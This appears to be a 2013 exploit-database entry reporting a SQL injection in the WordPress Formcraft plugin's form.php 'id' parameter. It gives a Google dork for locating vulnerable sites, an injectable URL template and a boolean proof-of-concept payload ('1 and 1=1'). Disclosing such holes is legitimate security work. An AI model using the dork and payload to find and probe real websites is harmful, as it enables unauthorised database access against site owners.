id: 21642
date: 12/10/2013
title: Wordpress Formcraft Plugin - SQL Injection Vulnerability
author: Ashiyane
cves: 

#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################
 
##############
Milad Hacking
 
We Love Mohammad
##############

#  0day.today [2023-03-21]  #